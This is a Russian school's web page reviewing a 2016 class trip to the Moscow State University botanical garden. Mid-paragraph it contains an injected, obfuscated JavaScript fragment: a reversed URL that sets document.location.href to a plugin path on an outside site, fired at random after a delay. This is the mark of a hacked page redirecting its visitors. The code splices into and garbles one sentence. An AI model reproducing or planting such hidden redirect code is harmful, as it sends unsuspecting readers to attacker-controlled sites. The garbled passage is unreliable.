logo

Отзыв о поездке 6 и 7 классов в Аптекарский огород МГУ 7 сентября 2016 года

Уверен, что ярким моментом в памяти шести- и семиклассников останется поездка в Аптекарский огород! Еще бы – что может быть лучше прогулки по уникальному парку, находящемуся практически в центре Москвы! Важно еще и то, что самое начало осени – уникальное время для посещения этого чрезвычайно интересного объекта!

Парк, на первый взгляд небольшой, вмещает в себя несколько оранжерей, пруды, горки, цветники, теплицы, дендрарий, тенистые аллеи с удивительными липами. Всего в парке более ста разнообразных растений! Мы со студентами за один час успели осмотреть многое!

У ребят была конкретная задача: слушать экскурсовода, фиксировать полученные сведения и готовить вопросы для викторины! Информации было действительно много: от того, что парк основан 310 лет назад Петром первым до ареалов распространения опунций, алоэ и агавы.

Чтобы ничего не упустить из виду, ребята использовали не только современные устройства – смартфоны, но и toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}total physical response, который так важен для современных аудиалов, визуалов и кинэстетиков!

Посмотреть, понюхать, потрогать, даже послушать растения можно было на каждом шагу! Особенно ребят привлекли орхидеи, ваниль и банановая роща!

А когда мы достигли искусственного верхового болота, на котором в условиях повышенных температур произрастают уникальные растения-хищники, то тут даже кураторы Светлана Николаевна и Екатерина Алексеевна не выдержали – пытались загнать муху прямо в растение.

Ребята были в восторге от оранжереи! Прямо из райского леса мы переместились в парк, где сделали общее фото на знаменитой можжевеловой горке!

После устроили конкурс селфи! Мальчишки и девчонки по группам носились по парку, фотографировались на фоне редких растений, а также делали фото с незнакомцем! Фотографии прислали Екатерине Алексеевне по вотсап – скоро будут результаты!
А мы с коллегами сделали такое фото на фоне уникального болота:

Спасибо всем участникам поездки! До скорых встреч!

0104 050812

02    06 07  0911 10 03